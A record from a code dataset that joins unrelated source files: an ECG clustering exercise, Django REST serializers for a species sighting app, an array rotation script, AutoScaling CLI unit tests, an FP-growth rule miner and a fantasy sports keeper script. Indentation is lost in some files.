test = np.load("../../Data/ECG/test.npy")

# Split features (all but last column) and labels (last column).
Xtr = train[:, :-1]
Xte = test[:, :-1]
# np.array(map(int, ...)) produces a useless 0-d object array on Python 3;
# astype(int) vectorizes the conversion and behaves the same on Python 2.
Ytr = train[:, -1].astype(int)
Yte = test[:, -1].astype(int)
#print "x"
#Add your code below
##########################################################################
# Question 1
##########################################################################
# K = 40
# scores = [0.0] * K
# for k in range(1,K+1):
#
# # KMeans with no. of clusters = k
# cluster = KMeans(n_clusters=k, random_state=10)
# cluster.fit(Xtr)
# scores[k - 1] = cluster_utils.cluster_quality(Xtr, cluster.labels_, k)
#
# plot.line_graph(range(1,K+1), scores, "Cluster Score VS K", "OnePointFour", "Score", "K")
##########################################################################
# Question 2
##########################################################################
# K = 6
#
# cluster = KMeans(n_clusters=K, random_state=10)
# cluster.fit(Xtr)
#
# proportions = cluster_utils.cluster_proportions(cluster.labels_, K)
# plot.bar_graph(proportions, "Cluster Proporstions", "TwoPointTwo")
#
# # Compute cluster means
# means = cluster_utils.cluster_means(Xtr, cluster.labels_, K)
# # Show cluster means
# cluster_utils.show_means(means, proportions).savefig("../Figures/TwoPointFourBarChart.pdf")
##########################################################################
# Question 3
##########################################################################
# K = 40
# scores = [0.0]*K
# for k in range(1,K +1):
# cluster = cluster_class(k)
# cluster.fit(Xtr,Ytr)
# scores[k-1] = cluster.score(Xte,Yte)
#
# plot.line_graph(range(1,K +1), scores, "Prediction Error vs No. of Clusters", "ThreePointFive", "Error", "No. of Clusters")
#
##########################################################################
# Question 4
##########################################################################
# Sweep the number of clusters for the bonus cluster-based classifier and
# record the test-set prediction error for each K.
K = 40
scores = [0.0]*K
for k in range(1,K +1):
    # cluster_class_bonus wraps clustering + per-cluster label assignment;
    # score() presumably returns test error — see cluster_class_bonus.
    cluster = cluster_class_bonus(k)
    cluster.fit(Xtr,Ytr)
    scores[k-1] = cluster.score(Xte,Yte)
# Save the error-vs-K curve to ../Figures (see plot.line_graph).
plot.line_graph(range(1,K +1), scores, "Prediction Error vs No. of Clusters", "ThreePointSeven", "Error", "No. of Clusters")
|
994,291 | 98df772795a941a59978fa9789638d2cd730a709 | from PIL import Image
from StringIO import StringIO
from redmap.common.urls import fqdn
from redmap.common.wms import get_distribution_url
from django.contrib.auth.models import User
from django.core import serializers as django_serializers
from django.core.files.uploadedfile import InMemoryUploadedFile
from redmap.apps.redmapdb.models import Sighting, Species, SpeciesCategory, Region, Person, \
SpeciesAllocation, SpeciesCategory, Region, Person, Accuracy, Count, Sex, \
SizeMethod, WeightMethod, Habitat, Method, Activity, Time, Organisation
from rest_framework import serializers, fields, status
from rest_framework.fields import ImageField
from rest_framework.response import Response
from rest_framework.reverse import reverse
from redmap.apps.restapi.extensions.serializers import PostModelSerializer
from sorl.thumbnail import get_thumbnail
from sorl.thumbnail.helpers import ThumbnailError
import base64
import magic
class FilterRelated(serializers.Field):
    """
    Helper class for generating links to filtered list views.
    """

    def __init__(self, view_name, filter_name, *args, **kwargs):
        # view_name: URL name of the list view to reverse;
        # filter_name: query parameter used to filter that list by obj.pk.
        self.view_name = view_name
        self.filter_name = filter_name
        super(FilterRelated, self).__init__(*args, **kwargs)

    def field_to_native(self, obj, field_name):
        # Build an absolute URL of the form <list-url>?<filter_name>=<obj.pk>.
        url = reverse(self.view_name)
        return fqdn("{0}?{1}={2}".format(url, self.filter_name, obj.pk))
class ManyHyperlinkedRelatedMethodField(serializers.ManyHyperlinkedRelatedField):
"""
Helper class for generating lists of related links not directly associated
through a *-to-many model fields.
"""
def __init__(self, method_name, *args, **kwargs):
self.method_name = method_name
kwargs['read_only']=True
super(ManyHyperlinkedRelatedMethodField, self).__init__(*args, **kwargs)
def field_to_native(self, obj, field_name):
values = getattr(self.parent, self.method_name)(obj)
if values:
return map(self.to_native, values)
class ManyIdRelatedMethodField(serializers.ManyRelatedField):
"""
Helper class for generating id lists of related objects not directly associated
through a *-to-many model fields.
"""
def __init__(self, method_name, field_name=None, *args, **kwargs):
self.method_name = method_name
self.field_name = field_name
kwargs['read_only'] = True
super(ManyIdRelatedMethodField, self).__init__(*args, **kwargs)
def field_to_native(self, obj, field_name):
field_name = self.field_name or field_name
values = getattr(self.parent, self.method_name)(obj)
if values:
return map(lambda v: getattr(v, field_name), values)
class SightingSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.Field()
category_list = ManyHyperlinkedRelatedMethodField(
'get_category_list', view_name="speciescategory-detail")
class Meta:
model = Sighting
fields = (
'id', 'url', 'species', 'other_species', 'is_published',
'region', 'update_time', 'category_list'
)
def get_category_list(self, obj):
return obj.categories
class UserSightingSerializer(SightingSerializer):
accuracy = serializers.PrimaryKeyRelatedField()
photo_url = serializers.SerializerMethodField('get_photo_url')
species_id = serializers.SerializerMethodField('get_species_id', )
region_id = serializers.SerializerMethodField('get_region_id')
time = serializers.PrimaryKeyRelatedField()
def get_photo_url(self, obj):
if obj.photo_url == None:
return None
try:
thumb = get_thumbnail(obj.photo_url, '1136x1136', quality=99)
return fqdn(thumb.url)
except (IOError, ThumbnailError):
return None
def get_species_id(self, obj):
if obj.species != None:
return obj.species.pk
return None
def get_region_id(self, obj):
if obj.region != None:
return obj.region.pk
return None
class Meta:
model = Sighting
fields = (
'id', 'url', 'species', 'species_id', 'other_species', 'is_published',
'region', 'region_id', 'update_time', 'category_list', 'latitude', 'longitude', 'accuracy', 'logging_date', 'is_valid_sighting', 'photo_url', 'sighting_date', 'time'
)
class SpeciesSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.Field()
picture_url = serializers.SerializerMethodField('get_picture_url')
sightings_url = FilterRelated('sighting-list', 'species')
distribution_url = serializers.SerializerMethodField('get_distribution_url')
category_list = ManyHyperlinkedRelatedMethodField(
'get_category_list', view_name="speciescategory-detail")
category_id_list = ManyIdRelatedMethodField(method_name="get_category_list", field_name="id")
region_id_list = ManyIdRelatedMethodField(method_name="get_region_list", field_name="id")
class Meta:
model = Species
fields = (
'id', 'url', 'species_name', 'common_name', 'update_time',
'short_description', 'description', 'image_credit',
'picture_url', 'sightings_url', 'distribution_url',
'category_list', 'category_id_list', 'region_id_list', 'notes'
)
def get_picture_url(self, species):
try:
thumb = get_thumbnail(species.picture_url, '640x640', quality=99)
return fqdn(thumb.url)
except (IOError, ThumbnailError):
return None
def get_distribution_url(self, species):
return get_distribution_url(species.pk, width=200, height=200)
def get_category_list(self, obj):
return SpeciesCategory.objects.filter(speciesincategory__species=obj)
def get_region_list(self, obj):
return Region.objects.filter(speciesallocation__species=obj).distinct()
class CategorySerializer(serializers.HyperlinkedModelSerializer):
    """Serializer for SpeciesCategory, exposing a 200x200 thumbnail URL."""

    id = serializers.Field()
    picture_url = serializers.SerializerMethodField('get_picture_url')

    def get_picture_url(self, obj):
        # Absolute 200x200 thumbnail URL, or None when the source image is
        # missing or cannot be thumbnailed.
        try:
            thumb = get_thumbnail(obj.picture_url, '200x200', quality=99)
            return fqdn(thumb.url)
        except (IOError, ThumbnailError):
            return None

    class Meta:
        model = SpeciesCategory
        fields = ('id', 'url', 'description', 'long_description', 'picture_url')
class RegionSerializer(serializers.HyperlinkedModelSerializer):
id = serializers.Field()
sightings_url = FilterRelated('sighting-list', 'region')
category_list = ManyHyperlinkedRelatedMethodField(
'get_category_list', view_name="speciescategory-detail")
class Meta:
model = Region
fields = ('id', 'url', 'slug', 'description', 'sightings_url', 'category_list')
def get_category_list(self, region):
return region.categories
class UserSerializer(serializers.ModelSerializer):
id = serializers.Field()
sightings = serializers.ManyPrimaryKeyRelatedField(
read_only=True)
region = serializers.SerializerMethodField('get_region_id')
def get_region_id(self, obj):
profile = obj.get_profile()
if not profile or not profile.region:
return None
return profile.region.id
class Meta:
model = User
fields = (
'id',
'username',
'email',
'first_name',
'last_name',
'sightings',
'region',
)
class PersonSerializer(serializers.ModelSerializer):
    """Serializer exposing a Person's mailing-list opt-in flag and region."""

    id = serializers.Field()

    class Meta:
        model = Person
        fields = (
            'id',
            'joined_mailing_list_on_signup',
            'region',
        )
class RegisterSerializer(PostModelSerializer):
join_mailing_list = fields.BooleanField(required=False)
region = fields.ChoiceField(required=True)
def __init__(self, *args, **kwargs):
self.base_fields['region'].choices = tuple([(None, '--None--')] + [(r.description, r.description) for r in Region.objects.all()])
super(RegisterSerializer, self).__init__(*args, **kwargs)
def validate_email(self, data, field_name):
"""
Validate that the email is not already
in use.
"""
existing = User.objects.filter(email__iexact=data['email'])
if existing.exists():
raise fields.ValidationError("A user with that email already exists.")
else:
return data
def to_native(self, obj):
ret = super(RegisterSerializer, self).to_native(obj)
ret['join_mailing_list'] = obj.get_profile().joined_mailing_list_on_signup
ret['region'] = obj.get_profile().region.description
return ret
def save(self, **kwargs):
user = super(RegisterSerializer, self).save(**kwargs)
user.set_password(user.password)
user.save()
profile = user.get_profile()
try:
profile.region = Region.objects.get(description=self.cleaned_data['region'])
except Region.DoesNotExist:
profile.region = None
profile.joined_mailing_list_on_signup = self.cleaned_data['join_mailing_list']
profile.save()
return user
class Meta:
model = User
postonly_fields = ('password',)
fields = (
'username',
'password',
'email',
'first_name',
'last_name',
'join_mailing_list',
'region',
)
class JsonBase64ImageFileField(ImageField):
    """ImageField that also accepts a base64-encoded image in the JSON body.

    When no multipart upload is present but the payload carries
    ``photo_url`` (base64 data) plus ``photo_url_name``, the data is
    decoded into an InMemoryUploadedFile and moved into ``files`` before
    delegating to the regular ImageField handling.
    """

    def field_from_native(self, data, files, field_name, reverted_data):
        if 'photo_url' not in files and 'photo_url' in data and 'photo_url_name' in data:
            decoded_image_data = base64.b64decode(data.get('photo_url'))

            # Sniff the mime type from the first KB for the django file handler.
            content_type_data = StringIO(decoded_image_data[:1024])
            content_type = magic.from_buffer(content_type_data.read(1024), mime=True)

            # Wrap the decoded bytes as an in-memory uploaded file.
            uploaded_file = StringIO(decoded_image_data)
            kwargs = {
                'file': uploaded_file,
                'field_name': 'photo_url',
                'name': data.get('photo_url_name'),
                'content_type': content_type,
                'size': uploaded_file.len,
                'charset': None,
            }
            files['photo_url'] = InMemoryUploadedFile(**kwargs)
            data.pop('photo_url')
        # Both branches previously ended with this identical super() call;
        # collapsed into a single exit point.
        return super(JsonBase64ImageFileField, self).field_from_native(
            data, files, field_name, reverted_data)

    def to_native(self, value):
        """Serialize as the stored file name rather than the full file."""
        return value.name
class CreateSightingSerializer(serializers.ModelSerializer):
id = fields.IntegerField(read_only=True)
pk = fields.IntegerField(read_only=True)
photo_url = JsonBase64ImageFileField(required=False, max_length=512)
class Meta:
model = Sighting
fields = (
'pk',
'id',
'accuracy',
'activity',
'count',
'depth',
'habitat',
'latitude',
'longitude',
'notes',
'other_species',
'photo_caption',
'photo_url',
'sex',
'sighting_date',
'size',
'size_method',
'species',
'time',
'water_temperature',
'weight',
'weight_method',
)
class FacebookSerializer(serializers.Serializer):
id = fields.IntegerField(read_only=True)
access_token = fields.CharField(max_length=255)
auth_token = fields.CharField(max_length=255, read_only=True)
def save(self, **kwargs):
pass
|
994,292 | 6d9600ec2cdc0d3f92729e73d483687479b64edf | def left_rotation(arr):
temp = arr[0]
for i in range(len(arr)-1):
arr[i] = arr[i+1]
arr[len(arr)-1] = temp
def array_rotation(arr, pos):
    """Rotate *arr* left by *pos* positions in place and print the result.

    Replaces *pos* repeated one-step rotations (O(n*pos)) with a single
    O(n) slice reassignment; ``pos`` is reduced modulo ``len(arr)`` so
    over-length rotations and empty arrays are handled safely.
    """
    if arr:  # guard: empty list would make the modulo below divide by zero
        pos %= len(arr)
        arr[:] = arr[pos:] + arr[:pos]
    print(arr)
def main():
    """Read an array and a rotation count from stdin, then rotate/print."""
    values = input("Please enter the array: ").split()
    arr = [int(v) for v in values]
    pos = int(input("Please enter the rotation: "))
    array_rotation(arr, pos)


main()
|
994,293 | 6ca26503dd10e2cc288375da8c1000ab0d30c47d | # Copyright 2016 Huawei, Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import mock
from asclient.common import resource as br
from asclient.osc.v1 import instance
from asclient.tests import base
from asclient.v1 import instance_mgr
from asclient.v1 import resource
from osc_lib import utils
class InstanceV1BaseTestCase(base.AutoScalingV1BaseTestCase):
def __init__(self, *args, **kwargs):
super(InstanceV1BaseTestCase, self).__init__(*args, **kwargs)
self._instances = [
{"instance_id": "dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"scaling_group_id": "ac8acbb4-e6ce-4890-a9f2-d8712b3d7385",
"scaling_group_name": "as-group-teo",
"life_cycle_state": "INSERVICE", "health_status": "NORMAL",
"scaling_configuration_name": "as-config-TEO",
"scaling_configuration_id": "498c242b-54a4-48ec-afcd",
"create_time": "2017-02-19T13:52:33Z",
"instance_name": "as-config-TEO_XQF2JJSI"},
{"instance_id": "4699d02c-6f4b-47e3-be79-8b92c665310b",
"scaling_group_id": "ac8acbb4-e6ce-4890-a9f2-d8712b3d7385",
"scaling_group_name": "as-group-teo",
"life_cycle_state": "INSERVICE", "health_status": "NORMAL",
"scaling_configuration_name": "as-config-TEO",
"scaling_configuration_id": "498c242b-54a4-48ec-afcd",
"create_time": "2017-02-19T13:40:12Z",
"instance_name": "as-config-TEO_LV1JS5P3"},
{"instance_id": "35d9225d-ca47-4d55-bc5d-3858c34610a5",
"scaling_group_id": "ac8acbb4-e6ce-4890-a9f2-d8712b3d7385",
"scaling_group_name": "as-group-teo",
"life_cycle_state": "INSERVICE", "health_status": "NORMAL",
"scaling_configuration_name": "as-config-TEO",
"scaling_configuration_id": "498c242b-54a4-48ec-afcd",
"create_time": "2017-02-19T08:24:12Z",
"instance_name": "as-config-TEO_2MKT59WO"}, ]
@mock.patch.object(instance_mgr.InstanceManager, "_list")
class TestListAutoScalingInstance(InstanceV1BaseTestCase):
def setUp(self):
super(TestListAutoScalingInstance, self).setUp()
self.cmd = instance.ListAutoScalingInstance(self.app, None)
def test_list_as_log(self, mocked):
args = [
"--group", "group-id",
"--lifecycle-status", "INSERVICE",
"--health-status", "NORMAL",
"--offset", "10",
"--limit", "20",
]
verify_args = [
("group", "group-id"),
("lifecycle_status", "INSERVICE"),
("health_status", "NORMAL"),
("offset", 10),
("limit", 20),
]
parsed_args = self.check_parser(
self.cmd, args, verify_args
)
with self.mocked_group_find as mocked_fg:
instances = [resource.AutoScalingInstance(None, i)
for i in self._instances]
mocked.return_value = br.ListWithMeta(instances, "Request-ID")
columns, data = self.cmd.take_action(parsed_args)
mocked_fg.assert_called_once_with("group-id")
url = "/scaling_group_instance/%s/list" % self._group.id
params = {
"life_cycle_status": "INSERVICE",
"health_status": "NORMAL",
"start_number": 10,
"limit": 20,
}
mocked.assert_called_once_with(url, params=params,
key="scaling_group_instances")
self.assertEquals(resource.AutoScalingInstance.list_column_names,
columns)
expected = [('dacd968b-2602-470d-a0e2-92a20c2f2b8b',
'as-config-TEO_XQF2JJSI',
'as-group-teo',
'as-config-TEO',
'INSERVICE',
'NORMAL'),
('4699d02c-6f4b-47e3-be79-8b92c665310b',
'as-config-TEO_LV1JS5P3',
'as-group-teo',
'as-config-TEO',
'INSERVICE',
'NORMAL'),
('35d9225d-ca47-4d55-bc5d-3858c34610a5',
'as-config-TEO_2MKT59WO',
'as-group-teo',
'as-config-TEO',
'INSERVICE',
'NORMAL')]
self.assertEquals(expected, data)
@mock.patch.object(instance_mgr.InstanceManager, "list")
@mock.patch.object(instance_mgr.InstanceManager, "_create")
class TestRemoveAutoScalingInstance(InstanceV1BaseTestCase):
def setUp(self):
super(TestRemoveAutoScalingInstance, self).setUp()
self.cmd = instance.RemoveAutoScalingInstance(self.app, None)
def test_remove_as_instance(self, mock_create, mock_list):
args = [
"--group", "group-id",
"--instance", "dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"--instance", "as-config-TEO_2MKT59WO",
"--delete",
]
verify_args = [
("group", "group-id"),
("instances", ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"as-config-TEO_2MKT59WO", ]),
("delete", True),
]
parsed_args = self.check_parser(
self.cmd, args, verify_args
)
with self.mocked_group_find as mocked_fg:
instances = [resource.AutoScalingInstance(None, i)
for i in self._instances]
mock_list.return_value = br.ListWithMeta(instances, "Request-ID")
mock_create.return_value = br.StrWithMeta('', 'Request-ID-2')
result = self.cmd.take_action(parsed_args)
mocked_fg.assert_called_once_with("group-id")
mock_list.assert_called_once_with(self._group.id)
url = "/scaling_group_instance/%s/action" % self._group.id
json = {
"action": "REMOVE",
"instances_id": ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ],
"instance_delete": "yes"
}
mock_create.assert_called_once_with(url, json=json, raw=True)
self.assertEquals('done', result)
def test_soft_remove_as_instance(self, mock_create, mock_list):
args = [
"--group", "group-id",
"--instance", "dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"--instance", "35d9225d-ca47-4d55-bc5d-3858c34610a5",
]
verify_args = [
("group", "group-id"),
("instances", ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ]),
]
parsed_args = self.check_parser(
self.cmd, args, verify_args
)
with self.mocked_group_find as mocked_fg:
instances = [resource.AutoScalingInstance(None, i)
for i in self._instances]
mock_list.return_value = br.ListWithMeta(instances, "Request-ID")
mock_create.return_value = br.StrWithMeta('', 'Request-ID-2')
result = self.cmd.take_action(parsed_args)
mocked_fg.assert_called_once_with("group-id")
mock_list.assert_called_once_with(self._group.id)
url = "/scaling_group_instance/%s/action" % self._group.id
json = {
"action": "REMOVE",
"instances_id": ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ],
}
mock_create.assert_called_once_with(url, json=json, raw=True)
self.assertEquals('done', result)
@mock.patch.object(utils, "find_resource")
@mock.patch.object(instance_mgr.InstanceManager, "_create")
class TestAddAutoScalingInstance(InstanceV1BaseTestCase):
def setUp(self):
super(TestAddAutoScalingInstance, self).setUp()
self.cmd = instance.AddAutoScalingInstance(self.app, None)
def test_add_as_instance(self, mock_create, mock_find_resource):
args = [
"--group", "group-id",
"--instance", "dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"--instance", "35d9225d-ca47-4d55-bc5d-3858c34610a5",
]
verify_args = [
("group", "group-id"),
("instances", ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ]),
]
parsed_args = self.check_parser(
self.cmd, args, verify_args
)
with self.mocked_group_find as mocked_fg:
mock_find_resource.side_effect = [
br.Resource(None, dict(id=parsed_args.instances[0])),
br.Resource(None, dict(id=parsed_args.instances[1])),
]
mock_create.return_value = br.StrWithMeta('', 'Request-ID-2')
result = self.cmd.take_action(parsed_args)
mocked_fg.assert_called_once_with("group-id")
url = "/scaling_group_instance/%s/action" % self._group.id
json = {
"action": "ADD",
"instances_id": ["dacd968b-2602-470d-a0e2-92a20c2f2b8b",
"35d9225d-ca47-4d55-bc5d-3858c34610a5", ],
}
mock_create.assert_called_once_with(url, json=json, raw=True)
self.assertEquals('done', result)
|
994,294 | 7d46f816d5810fb5fd0f35590bb8702afe531660 | # author: Justin Cui
# date: 2019/10/23
# email: 321923502@qq.com
# Load the demo transaction data
def load_dataset():
    """Return the hard-coded demo transaction database (list of item lists)."""
    transactions = [
        ['bread', 'milk', 'vegetable', 'fruit', 'eggs'],
        ['noodle', 'beef', 'pork', 'water', 'socks', 'gloves', 'shoes', 'rice'],
        ['socks', 'gloves'],
        ['bread', 'milk', 'shoes', 'socks', 'eggs'],
        ['socks', 'shoes', 'sweater', 'cap', 'milk', 'vegetable', 'gloves'],
        ['eggs', 'bread', 'milk', 'fish', 'crab', 'shrimp', 'rice'],
    ]
    return transactions
# Convert each transaction to a frozenset so it can serve as a dict key in later steps
def transfer_to_frozenset(data_set):
    """Map each transaction to a frozenset key with count 1.

    frozenset keys are hashable, so whole transactions can index the dicts
    used during FP-tree construction. NOTE: duplicate transactions collapse
    into one key with count 1 — identical to the original loop's behavior.
    """
    return {frozenset(transaction): 1 for transaction in data_set}
class TreeNode:
    """A node in an FP-tree.

    Each node records one item, how many transactions share the prefix path
    ending at this node, its parent, a cross-link to the next node holding
    the same item (the header-table chain), and its children by item name.
    """

    def __init__(self, nodeName, count, nodeParent):
        self.nodeName = nodeName
        self.count = count
        self.nodeParent = nodeParent
        # Next node with the same item name; threaded via the header table.
        self.nextSimilarItem = None
        # Child nodes keyed by item name.
        self.children = {}

    def increaseC(self, count):
        """Add *count* more occurrences to this node."""
        self.count += count

    def disp(self, ind=1):
        """Pretty-print the subtree rooted at this node (debug helper)."""
        print(' ' * ind, self.nodeName, ' ', self.count)
        for child in self.children.values():
            child.disp(ind + 1)
def createFPTree(frozenDataSet, minSupport):
    """Build an FP-tree from *frozenDataSet* ({frozenset(items): count}).

    Returns (tree_root, header_table) where header_table maps
    item -> [support, first TreeNode holding that item], or (None, None)
    when no single item reaches *minSupport*.
    """
    # First pass: total support of every individual item.
    headPointTable = {}
    for items in frozenDataSet:
        for item in items:
            headPointTable[item] = headPointTable.get(item, 0) + frozenDataSet[items]
    # Drop items below the support threshold.
    headPointTable = {k: v for k, v in headPointTable.items() if v >= minSupport}
    frequentItems = set(headPointTable.keys())
    if len(frequentItems) == 0: return None, None
    # Extend each entry with a slot for the head of its node-link chain.
    for k in headPointTable:
        headPointTable[k] = [headPointTable[k], None]
    fptree = TreeNode("null", 1, None)
    # scan dataset at the second time, filter out items for each record
    for items, count in frozenDataSet.items():
        frequentItemsInRecord = {}
        for item in items:
            if item in frequentItems:
                frequentItemsInRecord[item] = headPointTable[item][0]
        if len(frequentItemsInRecord) > 0:
            # Insert items in descending global-support order so transactions
            # with shared prefixes overlap in the tree.
            orderedFrequentItems = [v[0] for v in
                                    sorted(frequentItemsInRecord.items(), key=lambda v: v[1], reverse=True)]
            updateFPTree(fptree, orderedFrequentItems, headPointTable, count)
    return fptree, headPointTable
def updateFPTree(fptree, orderedFrequentItems, headPointTable, count):
    """Insert one support-ordered transaction into the tree, recursively.

    Reuses an existing child for the leading item (bumping its count) or
    creates a new node; then recurses with the remaining items.
    """
    # handle the first item
    if orderedFrequentItems[0] in fptree.children:
        fptree.children[orderedFrequentItems[0]].increaseC(count)
    else:
        fptree.children[orderedFrequentItems[0]] = TreeNode(orderedFrequentItems[0], count, fptree)
        # update headPointTable
        # NOTE(review): the header chain is only threaded when a brand-new
        # node is created, so each tree node appears exactly once per chain.
        if headPointTable[orderedFrequentItems[0]][1] == None:
            headPointTable[orderedFrequentItems[0]][1] = fptree.children[orderedFrequentItems[0]]
        else:
            updateHeadPointTable(headPointTable[orderedFrequentItems[0]][1], fptree.children[orderedFrequentItems[0]])
    # handle other items except the first item
    if (len(orderedFrequentItems) > 1):
        updateFPTree(fptree.children[orderedFrequentItems[0]], orderedFrequentItems[1::], headPointTable, count)
def updateHeadPointTable(headPointBeginNode, targetNode):
    """Append *targetNode* at the end of a header-table node-link chain.

    Follows nextSimilarItem links from *headPointBeginNode* to the last
    node of the chain, then links *targetNode* after it.
    """
    tail = headPointBeginNode
    while tail.nextSimilarItem is not None:
        tail = tail.nextSimilarItem
    tail.nextSimilarItem = targetNode
def mineFPTree(headPointTable, prefix, frequentPatterns, minSupport):
    """Recursively mine frequent patterns from an FP-tree.

    headPointTable   -- header table of the current (conditional) tree
    prefix           -- set of items conditioning the current tree
    frequentPatterns -- dict accumulating frozenset(pattern) -> support
    minSupport       -- minimum absolute support
    """
    # Visit items from lowest to highest support.
    itemsBySupport = [entry[0] for entry in
                      sorted(headPointTable.items(), key=lambda entry: entry[1][0])]
    if not itemsBySupport:
        return
    for item in itemsBySupport:
        # Every frequent item extends the prefix into a new pattern.
        extendedPrefix = prefix.copy()
        extendedPrefix.add(item)
        frequentPatterns[frozenset(extendedPrefix)] = headPointTable[item][0]
        # Build the item's conditional pattern base and recurse into the
        # conditional FP-tree when it is non-empty.
        conditionalBase = getPrefixPath(headPointTable, item)
        if conditionalBase != {}:
            conditionalTree, conditionalHeadPointTable = createFPTree(conditionalBase, minSupport)
            if conditionalHeadPointTable is not None:
                mineFPTree(conditionalHeadPointTable, extendedPrefix, frequentPatterns, minSupport)
def getPrefixPath(headPointTable, headPointItem):
    """Collect the conditional pattern base of *headPointItem*.

    Follows the header table's node-link chain for the item and, for each
    occurrence, records its ancestor path (excluding the item itself and
    the root) with that occurrence's count.

    Returns a dict mapping frozenset(prefix items) -> count, suitable as
    input to createFPTree for building the conditional tree.

    Fixed: the original duplicated the per-node handling once before the
    loop and again inside it, and raised AttributeError when the header
    entry's node link was still None; a single guarded loop covers both.
    """
    prefixPath = {}
    node = headPointTable[headPointItem][1]
    while node is not None:
        prefixs = ascendTree(node)
        if prefixs != []:
            prefixPath[frozenset(prefixs)] = node.count
        node = node.nextSimilarItem
    return prefixPath
def ascendTree(treeNode):
    """Return the item names on the path from *treeNode*'s parent up to,
    but excluding, the root node named 'null', in leaf-to-root order."""
    names = []
    node = treeNode
    while True:
        parent = node.nodeParent
        # Stop at the (parentless) top or at the synthetic root.
        if parent is None or parent.nodeName == 'null':
            break
        names.append(parent.nodeName)
        node = parent
    return names
def rulesGenerator(frequentPatterns, minConf, rules, data_length):
    """Derive association rules from the mined frequent patterns.

    Only itemsets with at least two items can be split into antecedent
    and consequent, so single-item sets are skipped. Rules are appended
    to the caller-supplied *rules* list.
    """
    for itemset in frequentPatterns:
        if len(itemset) <= 1:
            continue
        getRules(itemset, itemset, rules, frequentPatterns, minConf, data_length)
def remove_str(itemset, item):
    """Return *itemset* as a frozenset with every element equal to *item*
    removed.

    Fixed: the original parameters were named ``set`` and ``str``,
    shadowing the built-ins; all call sites pass positionally, so the
    rename is safe. The append-loop is replaced by a comprehension.
    """
    return frozenset(elem for elem in itemset if elem != item)
def getRules(frequentset, currentset, rules, frequentPatterns, minConf, data_length):
    """Recursively emit rules of the form antecedent --> consequent.

    For each element of *currentset*, the antecedent is *currentset*
    minus that element and the consequent is the rest of *frequentset*.
    confidence = support(frequentset) / support(antecedent);
    lift divides that by the removed item's estimated probability.
    A rule is kept when confidence >= minConf and lift > 1, appended at
    most once, and antecedents of size >= 2 are shrunk recursively.
    """
    for candidate in currentset:
        antecedent = remove_str(currentset, candidate)
        consequent = frequentset - antecedent
        confidence = frequentPatterns[frequentset] / frequentPatterns[antecedent]
        itemProbability = frequentPatterns[frozenset([candidate])] / data_length
        lift = frequentPatterns[frequentset] / (frequentPatterns[antecedent] * itemProbability)
        if confidence >= minConf and lift > 1:
            alreadyKnown = any(rule[0] == antecedent and rule[1] == consequent
                               for rule in rules)
            if not alreadyKnown:
                rules.append((antecedent, consequent, confidence))
            if len(antecedent) >= 2:
                getRules(frequentset, antecedent, rules, frequentPatterns, minConf, data_length)
def take_num(elem):
    """Sort key: order pattern lists by their length (shortest first)."""
    return len(elem)
if __name__ == '__main__':
    # Demo driver: build the FP-tree, mine frequent itemsets, then
    # generate association rules and print everything.
    print("fptree:")
    # load_dataset / transfer_to_frozenset are defined earlier in this
    # file (outside this excerpt); the latter converts transactions into
    # a frozenset -> count mapping as required by createFPTree.
    dataSet = load_dataset()
    frozenDataSet = transfer_to_frozenset(dataSet)
    # Minimum absolute support for an itemset to be considered frequent.
    minSupport = 3
    fptree, headPointTable = createFPTree(frozenDataSet, minSupport)
    # NOTE(review): createFPTree returns (None, None) when no item is
    # frequent, which would make this .disp() call raise — confirm the
    # demo dataset always yields at least one frequent item.
    fptree.disp()
    frequentPatterns = {}
    prefix = set([])
    mineFPTree(headPointTable, prefix, frequentPatterns, minSupport)
    # "频繁项集" = frequent itemsets.
    print("频繁项集:")
    # Print the mined itemsets ordered by size (shortest first).
    pattern_list = []
    for pattern in frequentPatterns:
        pattern_list.append(list(set(pattern)))
    pattern_list.sort(key=take_num)
    for list_item in pattern_list:
        print(list_item, end=" ")
    # Minimum confidence for a rule to be reported.
    minConf = 0.6
    rules = []
    rulesGenerator(frequentPatterns, minConf, rules, len(dataSet))
    # "关联规则" = association rules; "置信度为" = confidence.
    print("\n关联规则:")
    for rule in rules:
        print(set(rule[0]), '-->', set(rule[1]), "置信度为:", rule[2])
|
994,295 | ee113d352fe637ff2803f7e6c4592bc5f1f0a086 | from csv_writer import CSVWriter
from canonical_name import canonicalName
from current_team_name import currentTeamName
from draft_loader import DraftLoader
from keepers_loader import KeepersLoader
from player import Player
from player_status_finder import PlayerStatusFinder
from team import Team
from team_loader import TeamLoader
from team_owner import teamOwner
from transaction_loader import TransactionLoader
if __name__=="__main__":
    # Season being evaluated; all historical CSVs are located relative
    # to this year (one and two seasons back).
    currentYear = 2020
    transactionLoader = TransactionLoader()
    oneYearAgoTransactions = transactionLoader.load("data/transactions_" + str(currentYear - 1) + ".csv", 1)
    twoYearsAgoTransactions = transactionLoader.load("data/transactions_" + str(currentYear - 2) + ".csv", 2)
    draftLoader = DraftLoader()
    oneYearAgoDraft = draftLoader.load("data/draft_" + str(currentYear - 1) + ".csv")
    twoYearsAgoDraft = draftLoader.load("data/draft_" + str(currentYear - 2) + ".csv")
    keepersLoader = KeepersLoader()
    keepers = keepersLoader.load("data/keepers_" + str(currentYear - 1) + ".csv")
    # Build a Team object per roster, resolving each player's keeper
    # status from the loaded transaction/draft/keeper history.
    teams = []
    teamLoader = TeamLoader()
